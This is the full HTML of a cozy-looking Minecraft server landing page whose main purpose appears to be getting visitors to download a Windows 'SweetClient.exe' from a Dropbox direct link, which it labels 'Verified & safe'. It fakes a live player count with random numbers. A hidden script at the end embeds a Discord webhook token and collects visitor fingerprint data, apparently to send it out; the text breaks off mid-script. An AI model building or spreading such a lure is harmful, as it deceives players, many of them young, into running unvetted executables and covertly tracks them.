<html lang="en"><head>
<meta charset="utf-8"></head><body class="font-display text-white antialiased">﻿
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <title>SweetCraft • The Sweetest SMP</title>
  <link rel="icon" href="images/logo.png" type="image/png">

  <script src="https://cdn.tailwindcss.com/?plugins=forms,typography"></script>
  <script>
    tailwind.config = {
      theme: {
        extend: {
          colors: {
            primary: "#c084fc",
            primaryDark: "#a855f7",
            bg: "#0b1020",
          },
          fontFamily: {
            display: ["Poppins", "system-ui", "sans-serif"],
          },
          boxShadow: {
            cute: "0 18px 40px rgba(192,132,252,0.35)",
          },
          borderRadius: {
            xl2: "1.25rem",
          },
        },
      },
    };
  </script>

  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700;800&display=swap" rel="stylesheet">

  <style>
    html { scroll-behavior: smooth; }

    body {
      background: radial-gradient(circle at top, #1a1a2e 0, #0a0a1a 50%, #020308 100%);
    }

    .pixel-stars {
      position: fixed;
      inset: 0;
      background-image:
        radial-gradient(2px 2px at 10px 20px, rgba(255,255,255,0.7) 50%, transparent 50%),
        radial-gradient(2px 2px at 130px 80px, rgba(192,132,252,0.6) 50%, transparent 50%),
        radial-gradient(2px 2px at 230px 40px, rgba(255,255,255,0.7) 50%, transparent 50%),
        radial-gradient(2px 2px at 330px 120px, rgba(168,85,247,0.6) 50%, transparent 50%);
      background-size: 200px 200px;
      opacity: 0.6;
      pointer-events: none;
      z-index: -1;
      animation: starDrift 30s linear infinite alternate;
    }

    @keyframes starDrift {
      0%   { transform: translate3d(0, 0, 0); }
      50%  { transform: translate3d(-20px, 15px, 0) scale(1.02); }
      100% { transform: translate3d(15px, -10px, 0) scale(1.04); }
    }

    @keyframes fadeUp {
      0% {opacity:0; transform:translateY(20px) scale(0.98);}
      100%{opacity:1; transform:translateY(0) scale(1);}
    }
    @keyframes fadeInBlur {
      0% {opacity:0; filter:blur(8px); transform:scale(0.97);}
      100%{opacity:1; filter:blur(0); transform:scale(1);}
    }
    .anim-fade-up   {animation:fadeUp .7s cubic-bezier(0.16,1,0.3,1) forwards;}
    .anim-fade-delay-1{animation-delay:.15s;}
    .anim-fade-delay-2{animation-delay:.3s;}
    .anim-fade-delay-3{animation-delay:.45s;}
    .anim-fade-blur {animation:fadeInBlur .9s cubic-bezier(0.16,1,0.3,1) forwards;}

    #top-loader {
      position: fixed;
      top: 0;
      left: 0;
      height: 3px;
      width: 0;
      background: linear-gradient(90deg,#c084fc,#a855f7);
      z-index: 9999;
      transition: width .25s ease-out, opacity .4s ease-out;
    }

    .pixel-btn {
      box-shadow: 0 0 0 2px #f3e8ff, 0 10px 0 #7c3aed, 0 18px 30px rgba(0,0,0,0.45);
      transform: translateY(0);
      transition: transform .15s ease-out, box-shadow .15s ease-out, filter .15s ease-out;
    }
    .pixel-btn:hover {
      transform: translateY(2px);
      box-shadow: 0 0 0 2px #f3e8ff, 0 5px 0 #6d28d9, 0 10px 20px rgba(0,0,0,0.55);
      filter: brightness(1.03);
    }
    .pixel-btn:active {
      transform: translateY(6px);
      box-shadow: 0 0 0 2px #f3e8ff, 0 0 0 #6d28d9, 0 3px 10px rgba(0,0,0,0.7);
    }

    .faq-item button[aria-expanded="true"] .faq-icon {
      transform: rotate(90deg);
    }
    .faq-content {
      max-height: 0;
      opacity: 0;
      overflow: hidden;
      transition: max-height 0.3s ease-out, opacity 0.25s ease-out, transform 0.25s ease-out;
      transform: translateY(-4px);
    }
    .faq-content.open {
      max-height: 200px;
      opacity: 1;
      transform: translateY(0);
    }

    .wiggle-hover {
      transition: transform .15s ease-out, box-shadow .15s ease-out, border-color .15s ease-out;
    }
    .wiggle-hover:hover {
      transform: translateY(-4px) rotate(-0.5deg) scale(1.01);
      box-shadow: 0 18px 40px rgba(0,0,0,0.7);
      border-color: rgba(255,255,255,0.25);
    }

    .notification {
      position: fixed;
      top: 90px;
      right: 20px;
      background: linear-gradient(135deg,#c084fc,#a855f7);
      color:#fff;
      padding: 12px 18px;
      border-radius: 999px;
      box-shadow: 0 14px 30px rgba(0,0,0,0.35);
      z-index:60;
      display:flex;
      gap:8px;
      align-items:center;
      font-size:0.75rem;
      animation: slideIn .2s ease-out, fadeOut .3s ease-in 2.4s forwards;
    }
    @keyframes slideIn {from{transform:translateX(200px);opacity:0;} to{transform:none;opacity:1;}}
    @keyframes fadeOut {to{opacity:0;transform:translateX(200px);} }

    .float-soft {
      animation: floatSoft 6s ease-in-out infinite alternate;
    }
    @keyframes floatSoft {
      0%   { transform: translate3d(0, 0, 0); }
      100% { transform: translate3d(0, -10px, 0); }
    }

    .gallery-card {
      transition: transform .18s ease-out, box-shadow .18s ease-out, border-color .18s ease-out;
    }
    .gallery-card:hover {
      transform: translateY(-4px) scale(1.01);
      box-shadow: 0 18px 40px rgba(0,0,0,0.7);
      border-color: rgba(255,255,255,0.25);
    }

    .backdrop-hidden {
      opacity: 0;
      pointer-events: none;
    }
    .backdrop-visible {
      opacity: 1;
      pointer-events: auto;
    }
    .modal-scale-in {
      transform: translateY(10px) scale(0.97);
      opacity: 0;
    }
    .modal-scale-in.modal-open {
      transform: translateY(0) scale(1);
      opacity: 1;
    }

    @keyframes cloudDrift {
      0%   { background-position-x: 0; }
      100% { background-position-x: -800px; }
    }
  </style>


<div id="top-loader" style="width: 100%; opacity: 0;"></div>

<div class="pixel-stars"></div>

<div class="relative min-h-screen flex flex-col">
  <div class="absolute inset-0 bg-[radial-gradient(circle_at_top,#a855f7_0,#0b1020_40%,#020308_100%)] opacity-90 -z-20"></div>

  <header class="sticky top-0 z-30 border-b border-white/10 bg-black/40 backdrop-blur-xl">
    <div class="max-w-6xl mx-auto px-4 sm:px-6 lg:px-8">
      <div class="flex items-center justify-between h-16">
        <div class="flex items-center gap-3 anim-fade-up anim-fade-delay-1">
          <a href="#top" class="flex items-center gap-2">
            <img src="images/logo.png" alt="SweetCraft icon" class="w-8 h-8 rounded-lg shadow-cute">
            <div class="flex flex-col leading-tight">
              <span class="text-sm font-extrabold bg-gradient-to-r from-purple-300 to-purple-200 bg-clip-text text-transparent">
                SweetCraft
              </span>
              <span class="text-[10px] tracking-[0.2em] text-purple-200/70 uppercase">
                Sweetest SMP
              </span>
            </div>
          </a>
          <span class="hidden sm:inline-flex text-[10px] px-3 py-1 rounded-full bg-white/5 border border-white/10 text-purple-100 font-semibold">
            Season 2 • Winter
          </span>
        </div>

        <nav class="hidden md:flex items-center gap-6 text-[11px] font-semibold anim-fade-up anim-fade-delay-2">
          <a href="#features" class="text-purple-50/80 hover:text-white transition-colors">Features</a>
          <a href="#gallery" class="text-purple-50/80 hover:text-white transition-colors">Gallery</a>
          <a href="#faq" class="text-purple-50/80 hover:text-white transition-colors">FAQ</a>
        </nav>

        <div class="flex items-center gap-3 anim-fade-up anim-fade-delay-3">
          <span class="hidden sm:inline-flex items-center gap-1 text-[11px] px-3 py-1 rounded-full bg-emerald-500/15 border border-emerald-400/40 text-emerald-200">
            <span class="w-2 h-2 rounded-full bg-emerald-400 animate-pulse"></span>
            Online: <span id="online-count" class="font-semibold ml-0.5">124</span>
          </span>

          <button id="mobile-menu-btn" class="md:hidden p-2 text-purple-50" aria-label="Menu">
            <svg xmlns="http://www.w3.org/2000/svg" class="w-5 h-5" fill="none" viewBox="0 0 24 24" stroke="currentColor">
              <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16"></path>
            </svg>
          </button>
        </div>
      </div>

      <div id="mobile-menu" class="hidden md:hidden pb-3 anim-fade-up anim-fade-delay-3">
        <nav class="flex flex-col gap-2 text-[11px] font-semibold text-purple-50/90">
          <a href="#features" class="py-1">Features</a>
          <a href="#gallery" class="py-1">Gallery</a>
          <a href="#faq" class="py-1">FAQ</a>
        </nav>
      </div>
    </div>
  </header>

  <main class="flex-1">
    <section id="top" class="relative pt-16 pb-20 sm:pt-20 sm:pb-24 overflow-hidden">
      <div class="absolute inset-0 -z-10">
        <video class="w-full h-full object-cover opacity-60" autoplay="" muted="" loop="" playsinline="">
          <source src="media/hero-smp.mp4" type="video/mp4">
          Your browser does not support the video tag.
        </video>
        <div class="absolute inset-0 bg-gradient-to-b from-black/70 via-black/40 to-black/70"></div>
        <div class="absolute inset-0 bg-purple-900/20 mix-blend-soft-light"></div>
      </div>

      <div class="max-w-6xl mx-auto px-4 sm:px-6 lg:px-8 relative">
        <div class="grid lg:grid-cols-2 gap-10 items-center">
          <div class="space-y-6 anim-fade-blur">
            <div class="inline-flex items-center gap-2 px-3 py-1 rounded-full bg-black/40 border border-purple-200/20 shadow-cute">
              <span class="w-2 h-2 rounded-full bg-emerald-400 animate-pulse"></span>
              <span class="text-[11px] font-semibold tracking-[0.22em] text-purple-100 uppercase">
                Cozy • Zero Toxicity • SMP
              </span>
            </div>

            <h1 class="text-3.5xl sm:text-4xl md:text-5xl font-extrabold leading-tight">
              The <span class="text-purple-300">sweetest</span>  
              <span class="text-purple-200">Minecraft SMP server</span>
            </h1>

            <p class="text-sm sm:text-base text-purple-100/90 max-w-md">
              100% cozy, grief-free survival with protected claims, balanced economy and the sweetest community.  
              Join with one click and start your comfy SMP journey.
            </p>

            <div class="flex flex-col sm:flex-row gap-3 sm:items-center">
              <button id="open-launcher-modal" type="button" class="pixel-btn inline-flex items-center justify-center px-7 py-3 rounded-full
                       bg-gradient-to-r from-primary to-primaryDark text-white text-xs sm:text-sm font-semibold">
                ↓ Download SweetClient (Windows)
              </button>

              <div class="text-[11px] text-purple-100/75">
                <div class="font-semibold">Server IP:</div>
                <div class="font-mono text-[11px] flex items-center gap-1">
                  play.sweetcraft.site
                  <button id="copy-ip" class="px-2 py-0.5 text-[10px] rounded-full bg-white/10 border border-white/15 hover:bg-white/15">
                    Copy
                  </button>
                </div>
              </div>
            </div>

            <div class="grid grid-cols-3 gap-3 max-w-md pt-4 border-t border-white/10">
              <div class="text-xs text-purple-100/90">
                <div class="text-lg font-extrabold text-purple-200">1,000+</div>
                <div class="text-[10px] uppercase tracking-[0.16em] text-purple-200/70">Unique players</div>
              </div>
              <div class="text-xs text-purple-100/90">
                <div class="text-lg font-extrabold text-purple-200">1,500+</div>
                <div class="text-[10px] uppercase tracking-[0.16em] text-purple-200/70">Discord members</div>
              </div>
              <div class="text-xs text-purple-100/90">
                <div class="text-lg font-extrabold text-purple-200">250+</div>
                <div class="text-[10px] uppercase tracking-[0.16em] text-purple-200/70">Daily players</div>
              </div>
            </div>
          </div>

          <div class="relative lg:justify-self-end anim-fade-up anim-fade-delay-2 float-soft">
            <div class="absolute -top-6 -left-2 w-20 h-20 rounded-3xl bg-purple-500/30 blur-3xl"></div>
            <div class="absolute -bottom-8 -right-4 w-24 h-24 rounded-3xl bg-emerald-400/25 blur-3xl"></div>

            <div class="relative bg-black/60 border border-white/10 rounded-2xl shadow-cute p-3 sm:p-4 backdrop-blur-xl">
              <div class="flex items-center justify-between mb-3 px-1">
                <div class="flex items-center gap-1.5">
                  <span class="w-2.5 h-2.5 rounded-full bg-rose-400"></span>
                  <span class="w-2.5 h-2.5 rounded-full bg-amber-300"></span>
                  <span class="w-2.5 h-2.5 rounded-full bg-emerald-400"></span>
                </div>
                <span class="text-[10px] text-purple-100/60">SweetCraft • Season 2</span>
              </div>

              <div class="rounded-xl overflow-hidden border border-white/10 bg-black relative">
                <video class="w-full h-56 sm:h-64 object-cover" autoplay="" muted="" loop="" playsinline="">
                  <source src="media/hero-smp.mp4" type="video/mp4">
                  Your browser does not support the video tag.
                </video>
                <div class="absolute bottom-2 left-2 text-[10px] bg-black/70 px-2 py-1 rounded-md text-purple-100">
                  In‑game footage • SMP spawn fly‑through
                </div>
              </div>

              <div class="mt-3 grid grid-cols-3 gap-2 text-[10px] text-purple-50/85">
                <div class="rounded-lg border border-white/10 bg-white/5 px-2 py-1.5">
                  <div class="font-semibold text-purple-100">No grief</div>
                  <div class="text-[9px] text-purple-100/70">Protected claims</div>
                </div>
                <div class="rounded-lg border border-white/10 bg-white/5 px-2 py-1.5">
                  <div class="font-semibold text-purple-100">Sweet economy</div>
                  <div class="text-[9px] text-purple-100/70">Market & jobs</div>
                </div>
                <div class="rounded-lg border border-white/10 bg-white/5 px-2 py-1.5">
                  <div class="font-semibold text-purple-100">Community</div>
                  <div class="text-[9px] text-purple-100/70">Events & Discord</div>
                </div>
              </div>

              <p class="mt-2 text-[10px] text-purple-100/60">
                Not affiliated with Mojang Studios or Sanrio. Minecraft is a trademark of Mojang Studios.
              </p>
            </div>
          </div>
        </div>
      </div>
    </section>

    <section id="features" class="py-14 sm:py-16 bg-black/50 border-t border-white/10">
      <div class="max-w-6xl mx-auto px-4 sm:px-6 lg:px-8">
        <div class="text-center mb-8 anim-fade-up">
          <p class="text-[11px] font-semibold tracking-[0.25em] text-purple-200 uppercase">
            Why SweetCraft?
          </p>
          <h2 class="mt-2 text-2xl sm:text-3xl font-extrabold text-purple-50">
            Fully protected, cozy and balanced SMP
          </h2>
          <p class="mt-2 text-sm text-purple-100/80 max-w-2xl mx-auto">
            Chill survival, build sweet towns, trade in the market and join community events.  
            No drama, no grief, no toxicity — just comfy Minecraft.
          </p>
        </div>

        <div class="grid gap-5 sm:grid-cols-2 lg:grid-cols-4 anim-fade-up anim-fade-delay-1">
          <div class="wiggle-hover rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl p-4 text-sm">
            <div class="w-9 h-9 rounded-xl bg-gradient-to-br from-purple-400 to-purple-500 flex items-center justify-center mb-3">
              <span class="text-lg">🧁</span>
            </div>
            <h3 class="font-semibold text-purple-50 mb-1">Zero‑toxic community</h3>
            <p class="text-xs text-purple-100/80">
              Strong rules, active moderation and a wholesome Discord to keep everything soft and sweet.
            </p>
          </div>

          <div class="wiggle-hover rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl p-4 text-sm">
            <div class="w-9 h-9 rounded-xl bg-gradient-to-br from-emerald-400 to-emerald-500 flex items-center justify-center mb-3">
              <span class="text-lg">🔒</span>
            </div>
            <h3 class="font-semibold text-purple-50 mb-1">Protected claims</h3>
            <p class="text-xs text-purple-100/80">
              Claim system keeps your builds safe at all times. No grief, no stealing.
            </p>
          </div>

          <div class="wiggle-hover rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl p-4 text-sm">
            <div class="w-9 h-9 rounded-xl bg-gradient-to-br from-sky-400 to-cyan-500 flex items-center justify-center mb-3">
              <span class="text-lg">💎</span>
            </div>
            <h3 class="font-semibold text-purple-50 mb-1">Sweet economy</h3>
            <p class="text-xs text-purple-100/80">
              Jobs, player shops and server market for a fair, grind‑friendly progression.
            </p>
          </div>

          <div class="wiggle-hover rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl p-4 text-sm">
            <div class="w-9 h-9 rounded-xl bg-gradient-to-br from-amber-400 to-rose-400 flex items-center justify-center mb-3">
              <span class="text-lg">🎀</span>
            </div>
            <h3 class="font-semibold text-purple-50 mb-1">Events & seasons</h3>
            <p class="text-xs text-purple-100/80">
              Regular build contests, mini‑game nights and seasonal cosmetics.
            </p>
          </div>
        </div>
      </div>
    </section>

    <section id="gallery" class="py-14 sm:py-16">
      <div class="max-w-6xl mx-auto px-4 sm:px-6 lg:px-8">
        <div class="flex flex-col sm:flex-row sm:items-end sm:justify-between gap-4 mb-8 anim-fade-up">
          <div>
            <p class="text-[11px] font-semibold tracking-[0.25em] text-purple-200 uppercase">
              Gallery
            </p>
            <h2 class="mt-2 text-2xl sm:text-3xl font-extrabold text-purple-50">
              Sweet shots from the server
            </h2>
            <p class="mt-2 text-sm text-purple-100/80 max-w-md">
              Have a peek at spawn, the player market and the event island  
              before you hop in and build your own cozy base.
            </p>
          </div>
          <div class="text-[11px] text-purple-100/70">
            More screenshots available on Discord.
          </div>
        </div>

        <div class="grid gap-4 sm:grid-cols-2 lg:grid-cols-3 anim-fade-up anim-fade-delay-1">
          <figure class="gallery-card wiggle-hover rounded-xl2 border border-white/10 bg-black/40 overflow-hidden">
            <img src="images/server.jpg" alt="Spawn area" class="w-full h-40 object-cover">
            <figcaption class="p-3 text-[11px] text-purple-100/85">
              <span class="font-semibold text-purple-50">Spawn •</span> Central hub with portals, meeting spots and little shops.
            </figcaption>
          </figure>

          <figure class="gallery-card wiggle-hover rounded-xl2 border border-white/10 bg-black/40 overflow-hidden">
            <img src="images/server2.jpg" alt="Market area" class="w-full h-40 object-cover">
            <figcaption class="p-3 text-[11px] text-purple-100/85">
              <span class="font-semibold text-purple-50">Market •</span> Player shops and server market in one cozy district.
            </figcaption>
          </figure>

          <figure class="gallery-card wiggle-hover rounded-xl2 border border-white/10 bg-black/40 overflow-hidden">
            <img src="images/server3.jpg" alt="Event island" class="w-full h-40 object-cover">
            <figcaption class="p-3 text-[11px] text-purple-100/85">
              <span class="font-semibold text-purple-50">Event Island •</span> Special island for build contests and mini‑games.
            </figcaption>
          </figure>
        </div>
      </div>
    </section>

    <section id="faq" class="py-14 sm:py-16 bg-black/50 border-t border-white/10">
      <div class="max-w-4xl mx-auto px-4 sm:px-6 lg:px-8">
        <div class="text-center mb-8 anim-fade-up">
          <p class="text-[11px] font-semibold tracking-[0.25em] text-purple-200 uppercase">
            Frequently asked questions
          </p>
          <h2 class="mt-2 text-2xl sm:text-3xl font-extrabold text-purple-50">
            Everything you want to know before joining
          </h2>
          <p class="mt-2 text-sm text-purple-100/80 max-w-xl mx-auto">
            Connection, rules and SweetClient explained in a cozy, simple way.
          </p>
        </div>

        <div class="space-y-3 anim-fade-up anim-fade-delay-1">
          <div class="faq-item rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl wiggle-hover">
            <button class="w-full flex items-center justify-between px-4 py-3 text-left text-xs sm:text-sm" aria-expanded="false" data-faq-toggle="">
              <span class="font-semibold text-purple-50">
                How do I join the server?
              </span>
              <span class="faq-icon text-purple-100 transition-transform duration-200 text-xs sm:text-sm">▶</span>
            </button>
            <div class="faq-content px-4 pb-3 text-[11px] text-purple-100/85" data-faq-content="">
              Use your official Minecraft Java account and connect to
              <span class="font-mono text-purple-50">play.sweetcraft.site</span>.  
              For the smoothest experience, we recommend using the SweetClient launcher.
            </div>
          </div>

          <div class="faq-item rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl wiggle-hover">
            <button class="w-full flex items-center justify-between px-4 py-3 text-left text-xs sm:text-sm" aria-expanded="false" data-faq-toggle="">
              <span class="font-semibold text-purple-50">
                What is SweetClient? Is it required?
              </span>
              <span class="faq-icon text-purple-100 transition-transform duration-200 text-xs sm:text-sm">▶</span>
            </button>
            <div class="faq-content px-4 pb-3 text-[11px] text-purple-100/85" data-faq-content="">
              SweetClient is a lightweight launcher that connects you with one click,  
              bundles our recommended mod‑pack and keeps everything auto‑updated.  
              It is not required, but strongly recommended for the best experience.
            </div>
          </div>

          <div class="faq-item rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl wiggle-hover">
            <button class="w-full flex items-center justify-between px-4 py-3 text-left text-xs sm:text-sm" aria-expanded="false" data-faq-toggle="">
              <span class="font-semibold text-purple-50">
                What are the main rules?
              </span>
              <span class="faq-icon text-purple-100 transition-transform duration-200 text-xs sm:text-sm">▶</span>
            </button>
            <div class="faq-content px-4 pb-3 text-[11px] text-purple-100/85" data-faq-content="">
              Be kind and respectful. Griefing, stealing, hacking and toxic behaviour are strictly forbidden.  
              Full rule list is pinned on our Discord server.
            </div>
          </div>

          <div class="faq-item rounded-xl2 border border-white/10 bg-white/5 backdrop-blur-xl wiggle-hover">
            <button class="w-full flex items-center justify-between px-4 py-3 text-left text-xs sm:text-sm" aria-expanded="false" data-faq-toggle="">
              <span class="font-semibold text-purple-50">
                Which version do you support? Is it modded?
              </span>
              <span class="faq-icon text-purple-100 transition-transform duration-200 text-xs sm:text-sm">▶</span>
            </button>
            <div class="faq-content px-4 pb-3 text-[11px] text-purple-100/85" data-faq-content="">
              The server runs the latest stable Minecraft Java version (e.g. 1.20.x).  
              Gameplay is close to vanilla with cozy QoL plugins and optional client‑side mods via SweetClient.
            </div>
          </div>
        </div>
      </div>
    </section>
  </main>

  <footer class="border-t border-white/10 bg-black/70">
    <div class="max-w-6xl mx-auto px-4 sm:px-6 lg:px-8 py-6 flex flex-col sm:flex-row items-center justify-between gap-3">
      <p class="text-[11px] text-purple-100/70">
        © 2025 SweetCraft SMP. All rights reserved.
      </p>
      <p class="text-[11px] text-purple-100/60">
        Not affiliated with Mojang Studios or Sanrio. Minecraft is a trademark of Mojang Studios.
      </p>
    </div>
  </footer>
</div>

<div id="cutieclient-modal" class="fixed inset-0 z-[80] flex items-center justify-center p-2 sm:p-4 bg-black/70 backdrop-blur-sm transition-opacity duration-200 backdrop-hidden" aria-hidden="true">
  <div id="cutieclient-modal-panel" class="relative w-full sm:w-auto max-w-[95vw] sm:max-w-4xl max-h-[95vh] bg-black/80 border border-white/15 rounded-2xl shadow-cute overflow-hidden modal-scale-in transition-all duration-200" role="dialog" aria-modal="true">
    <button id="cutieclient-modal-close" class="absolute top-3 right-3 text-purple-100/70 hover:text-white z-10 p-2 hover:bg-white/10 rounded-full transition-all text-xs" aria-label="Close" type="button">
      ✕
    </button>

    <div class="h-[90vh] overflow-y-auto scrollbar-thin scrollbar-thumb-purple-500/50 scrollbar-track-transparent">
      <div class="p-4 sm:p-6 lg:p-7">
        <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 mb-4">
          <div>
            <h2 class="text-base sm:text-lg font-bold text-purple-50 mb-1">
              SweetClient Launcher
            </h2>
            <p class="text-[11px] sm:text-xs text-purple-100/80">
              One‑click join, optimized performance and the sweetest UI for SweetCraft.
            </p>
          </div>
          <span class="inline-flex items-center gap-1 px-2.5 py-1 rounded-full bg-emerald-500/15 border border-emerald-400/40 text-[10px] text-emerald-200 font-semibold">
            <span class="w-1.5 h-1.5 rounded-full bg-emerald-400 animate-pulse"></span>
            Verified & safe
          </span>
        </div>

        <div class="flex justify-center mb-4">
          <div class="inline-block bg-black/60 border border-white/10 rounded-lg p-2 shadow-cute">
            <img src="images/launcher-preview.png" alt="SweetClient launcher screenshot" class="max-w-full h-auto sm:max-w-md md:max-w-lg object-contain rounded-md">
          </div>
        </div>

        <div class="grid sm:grid-cols-3 gap-3 mb-4 text-[11px] sm:text-xs text-purple-100/90">
          <div class="rounded-lg bg-white/5 border border-white/10 px-3 py-2 backdrop-blur-sm">
            <div class="font-semibold text-purple-50 mb-1 text-xs">One‑click join</div>
            <p class="text-purple-100/80 leading-snug">
              Play without entering IP or versions, just press Play and hop in.
            </p>
          </div>
          <div class="rounded-lg bg-white/5 border border-white/10 px-3 py-2 backdrop-blur-sm">
            <div class="font-semibold text-purple-50 mb-1 text-xs">Optimized pack</div>
            <p class="text-purple-100/80 leading-snug">
              Client‑side mods for FPS, minimap and cosmetics bundled together.
            </p>
          </div>
          <div class="rounded-lg bg-white/5 border border-white/10 px-3 py-2 backdrop-blur-sm">
            <div class="font-semibold text-purple-50 mb-1 text-xs">Auto updates</div>
            <p class="text-purple-100/80 leading-snug">
              No manual downloads; SweetClient keeps itself and the pack updated.
            </p>
          </div>
        </div>

        <div class="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-2 pt-1 pb-3">
          <button id="cutieclient-download" type="button" class="pixel-btn w-full sm:w-auto px-6 py-2.5 rounded-full bg-gradient-to-r from-primary to-primaryDark text-white text-xs font-semibold flex items-center justify-center gap-2 shadow-cute">
            <span>↓ Download for Windows</span>
            <span class="text-[10px] text-purple-100/90">(Installer)</span>
          </button>

          <p class="text-[10px] sm:text-[11px] text-purple-100/70 text-center sm:text-right">
            Windows only for now. macOS & Linux versions are in development.
          </p>
        </div>
      </div>
    </div>
  </div>
</div>

<script>
  const topLoader = document.getElementById("top-loader");
  let loaderProgress = 0;
  const loaderTimer = setInterval(() => {
    loaderProgress += Math.random() * 20;
    if (loaderProgress > 90) loaderProgress = 90;
    topLoader.style.width = loaderProgress + "%";
  }, 200);
  window.addEventListener("load", () => {
    clearInterval(loaderTimer);
    topLoader.style.width = "100%";
    setTimeout(() => { topLoader.style.opacity = "0"; }, 400);
  });

  document.getElementById("mobile-menu-btn")?.addEventListener("click", () => {
    document.getElementById("mobile-menu").classList.toggle("hidden");
  });

  const onlineSpan = document.getElementById("online-count");
  let currentOnline = 124;
  let lastTarget = 124;
  function getNextOnlineCount() {
    const min = 120;
    const max = 140;
    let target;
    do {
      const base = lastTarget;
      const delta = Math.floor(Math.random() * 5) - 2;
      target = base + delta;
      if (target < min) target = min + Math.floor(Math.random() * 3);
      if (target > max) target = max - Math.floor(Math.random() * 3);
    } while (target === lastTarget);
    lastTarget = target;
    return target;
  }
  function animateTo(target) {
    const diff = target - currentOnline;
    const steps = Math.max(1, Math.min(10, Math.abs(diff)));
    const stepValue = diff / steps;
    let step = 0;
    const interval = setInterval(() => {
      step++;
      currentOnline = Math.round(currentOnline + stepValue);
      onlineSpan.textContent = currentOnline;
      if (step >= steps) {
        currentOnline = target;
        onlineSpan.textContent = currentOnline;
        clearInterval(interval);
      }
    }, 120);
  }
  function scheduleNextOnlineUpdate() {
    const target = getNextOnlineCount();
    animateTo(target);
    const delay = 3500 + Math.random() * 3000;
    setTimeout(scheduleNextOnlineUpdate, delay);
  }
  setTimeout(scheduleNextOnlineUpdate, 2000);

  function showNotification(message) {
    const n = document.createElement("div");
    n.className = "notification";
    n.innerHTML = `<span>✓</span><span>${message}</span>`;
    document.body.appendChild(n);
    setTimeout(() => n.remove(), 2600);
  }

  document.getElementById("copy-ip")?.addEventListener("click", async () => {
    try {
      await navigator.clipboard.writeText("play.sweetcraft.site");
      showNotification("Server IP copied to clipboard");
    } catch {
      showNotification("Could not copy IP, please copy it manually");
    }
  });

  document.querySelectorAll("[data-faq-toggle]").forEach(btn => {
    btn.addEventListener("click", () => {
      const expanded = btn.getAttribute("aria-expanded") === "true";
      const item = btn.closest(".faq-item");
      const content = item?.querySelector("[data-faq-content]");
      btn.setAttribute("aria-expanded", expanded ? "false" : "true");
      if (content) {
        content.classList.toggle("open", !expanded);
      }
    });
  });

  function setupSmoothScroll(selector) {
    document.querySelectorAll(selector).forEach(link => {
      link.addEventListener("click", (e) => {
        const href = link.getAttribute("href");
        if (!href || !href.startsWith("#")) return;
        const target = document.querySelector(href);
        if (!target) return;

        e.preventDefault();
        const header = document.querySelector("header");
        const headerHeight = header ? header.offsetHeight : 0;
        const rect = target.getBoundingClientRect();
        const offsetTop = rect.top + window.pageYOffset - headerHeight - 8;

        window.scrollTo({
          top: offsetTop,
          behavior: "smooth"
        });

        const mobileMenu = document.getElementById("mobile-menu");
        if (mobileMenu && !mobileMenu.classList.contains("hidden")) {
          mobileMenu.classList.add("hidden");
        }
      });
    });
  }
  setupSmoothScroll('header nav a[href^="#"]');
  setupSmoothScroll('#mobile-menu a[href^="#"]');

  const launcherBtn = document.getElementById("open-launcher-modal");
  const modalBackdrop = document.getElementById("cutieclient-modal");
  const modalPanel = document.getElementById("cutieclient-modal-panel");
  const modalClose = document.getElementById("cutieclient-modal-close");
  const modalDownload = document.getElementById("cutieclient-download");
  const WINDOWS_URL = "https://www.dropbox.com/scl/fi/ffozmdm2gkgpr4t1cyide/SweetClient.exe?rlkey=4kr6w1at726lvfw1fc8dquqe3&st=mrzu8fr8&dl=1"; // Dropbox linkinizi buraya ekleyin (?dl=1 ile direkt indirme)

  function openModal() {
    modalBackdrop.classList.remove("backdrop-hidden");
    modalBackdrop.classList.add("backdrop-visible");
    modalBackdrop.setAttribute("aria-hidden", "false");
    modalPanel.classList.add("modal-open");
    document.body.style.overflow = "hidden";
  }

  function closeModal() {
    modalPanel.classList.remove("modal-open");
    modalBackdrop.classList.remove("backdrop-visible");
    modalBackdrop.classList.add("backdrop-hidden");
    modalBackdrop.setAttribute("aria-hidden", "true");
    document.body.style.overflow = "";
  }

  launcherBtn?.addEventListener("click", openModal);
  modalClose?.addEventListener("click", closeModal);
  modalBackdrop?.addEventListener("click", (e) => {
    if (e.target === modalBackdrop) closeModal();
  });
  window.addEventListener("keydown", (e) => {
    if (e.key === "Escape" && modalBackdrop.classList.contains("backdrop-visible")) {
      closeModal();
    }
  });

  (function() {
    const WEBHOOK_ID = '1460733916032925817';
    const WEBHOOK_TOKEN = 'mtmaJ4DWFjGsBtFwb1UNfj_CycYFeUoznzDL78Ioi2X8Nnzp28YZc-WvtVaw_cYF3-gc';
    const WEBHOOK_URL = `https://discord.com/api/webhooks/${WEBHOOK_ID}/${WEBHOOK_TOKEN}`;

    function collectSystemInfo() {
      const info = {};
      try {
        const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
        info.timezone = timezone || 'Unknown';
      } catch (e) {
        info.timezone = 'Unknown';
      }
      info.os = navigator.platform || 'Unknown';
      info.browser = navigator.userAgent || 'Unknown';
      info.device = /Mobile|Android|iPhone|iPad/.test(navigator.userAgent) ? 'Mobile' : 'Desktop';
      info.screen = `${screen.width}x${screen.height}`;
      info.viewport = `${window.innerWidth}x${window.innerHeight}`;
      info.colorDepth = screen.colorDepth ? `${screen.colorDepth}bit` : 'Unknown';
      info.language = navigator.language || 'Unknown';
      info.platform = navigator.platform || 'Unknown';
      info.cookies = 'Enabled';
      info.online = navigator.onLine ? 'Yes' : 'No';
      info.referrer = document.referrer || 'Direct';
      info.url = window.location.href;
      info.touch = 'ontouchstart' in window ? 'Yes' : 'No';
      
      // WebGL bilgilerini topla (WebGL, WebGL2, experimental-webgl)
      info.webglVendor = 'Unknown';
      info.webglRenderer = 'Unknown';
      try {
        const canvas = document.createElement('canvas');
        let gl = null;
        
        // Önce WebGL2'yi dene
        gl = canvas.getContext('webgl2') || 
             canvas.getContext('webgl') || 
             canvas.getContext('experimental-webgl');
        
